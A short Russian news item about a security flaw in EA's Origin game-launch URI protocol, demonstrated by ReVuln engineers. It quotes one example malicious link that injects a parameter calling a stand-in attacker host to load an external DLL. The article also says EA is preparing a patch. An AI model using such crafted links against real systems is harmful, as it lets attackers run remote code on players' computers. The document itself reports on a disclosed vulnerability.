Обнаружена крупная брешь в безопасности Origin
Серьезная брешь в системе безопасности была обнаружена в протоколе Origin, который используется для запуска игр через кастомные линки с использованием структуры origin. Ars Technica сообщает, что группа инженеров ReVuln продемонстрировала то, как вредоносные программы могут запускаться при помощи модифицированных ссылок Origin скрытых под видом запуска игры.
В обычной ситуации, игра Origin вызывает комманду "origin://LaunchGame/[GameID]" при запуске чего-либо через браузер. По словам инженеров ReVuln, взломщики могут просто модифицировать путь к чему-то вроде "origin://LaunchGame/[GameID]?CommandParams= -openautomate ATTACKER_IPevil.dll", для заражения команды, заставляя запускать внешний DLL.
В дополнении к этому было опубликовано видео демонстрирующее брешь.
EA сообщает, что уже приступила к решению проблемы и патч будет выпущен уже в ближайшее время.
- EA увольняет 670 сотрудников, закрывает игры и отменяет "разработку лицензионной IP", включая Star Wars FPS от Respawn
- Фанаты Apex Legends обвиняют разработчиков в использовании ИИ для кроссовера с FF7 Rebirth
- Сценарист Mass Effect покинул BioWare благодаря работе над Legendary Edition